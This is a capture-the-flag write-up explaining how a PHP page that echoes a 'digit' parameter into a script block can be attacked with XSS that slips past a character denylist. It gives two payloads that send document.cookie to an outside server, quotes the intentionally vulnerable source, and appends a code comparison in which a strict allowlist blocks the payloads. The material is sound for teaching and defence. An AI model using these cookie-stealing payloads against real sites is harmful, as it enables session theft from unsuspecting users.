JavaScript Argument Injection to XSS: Bypassing a Regex Filter

From the ARA 5.0 CTF web challenge.

Source: dist.zip

The index page has an XSS vulnerability:

    <script>
        var multiply = function(a, b) {
            return a * b;
        }

        var result = multiply(7, <?php echo $digit; ?>);

        document.querySelector('.result').textContent = 'The result is: ' + result;
    </script>

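The input goes through this filter:

    $digit = $_GET['digit'];
    // (int) keeps only the leading numeric part, so "1,anything" is truthy
    if ((int) $digit) {
        $digit = $_GET['digit'];
        // reject the request if any denylisted character is present
        if (preg_match('/[<>`~\\\'()]/', $digit)) {
            http_response_code(403);
            die('403 Forbidden');
        }
    } else {
        $digit = "0";
    }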

How can we inject XSS using a digit and the other allowed characters? We know preg_match bans these characters:

  1. <
  2. >
  3. `
  4. ~
  5. \ (backslash)
  6. ' (single quote)
  7. ( (opening parenthesis)
  8. ) (closing parenthesis)

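But [ and ] and , and + are not banned.

So we can use a payload of either form:

    number,javascriptcode
    number[javascriptcode]

The value has to start with a non-zero number so that (int) $digit is truthy. After that, JavaScript evaluates the injected expression either as an extra argument to multiply() (comma form) or as a computed property name (bracket form).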

Here are my payloads:

    1,location="https://yourserver.com?flag="+document.cookie

or

    1[location="https://yourserver.com?flag"+document.cookie]

Don't forget to URL-encode the + (otherwise it is decoded as a space in the query string).


Then paste it into the bot and get the flag.
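
The filter discussed above compared with a strict integer allowlist, as an added example that is not part of the original writeup or the challenge source. The function names are made up here, phpIntCast only approximates PHP's (int) cast, and strictFilter assumes the page needs nothing but a non-negative integer.

```javascript
// Added example (not the challenge's code): the page's PHP filter modelled in
// JavaScript, next to a strict allowlist. Function names are hypothetical.

// Approximation of PHP's (int) cast on a string: optional leading whitespace
// and sign, then digits; everything after the numeric prefix is ignored.
function phpIntCast(s) {
  const m = /^[ \t\n\r\v\f]*([+-]?\d+)/.exec(s);
  return m ? parseInt(m[1], 10) : 0;
}

// Character class from the page's preg_match call, after PHP has unescaped
// the single-quoted string.
const DENYLIST = /[<>`~\'()]/;

// Mirrors the page's filter: returns the text echoed into the <script> block,
// or null where the PHP code answers 403.
function originalFilter(digit) {
  if (phpIntCast(digit) === 0) return "0";
  return DENYLIST.test(digit) ? null : digit;
}

// Hardened variant. Assumption: the page only needs a non-negative integer,
// so the whole value must be digits and is re-serialised as a number.
function strictFilter(digit) {
  return /^[0-9]{1,9}$/.test(digit) ? String(Number(digit)) : "0";
}

// The line of the page that receives the value.
function render(filter, digit) {
  const v = filter(digit);
  return v === null ? "403 Forbidden" : `var result = multiply(7, ${v});`;
}

// Inputs: a normal value, the two payloads from the writeup, and a constructed
// value containing banned parentheses.
const SAMPLES = [
  "6",
  '1,location="https://yourserver.com?flag="+document.cookie',
  '1[location="https://yourserver.com?flag"+document.cookie]',
  "7*(6)",
];

for (const s of SAMPLES) {
  console.log("input   :", s);
  console.log("original:", render(originalFilter, s));
  console.log("strict  :", render(strictFilter, s));
}
```

The denylist passes both payloads through unchanged, while the allowlist renders multiply(7, 0) for anything that is not purely digits.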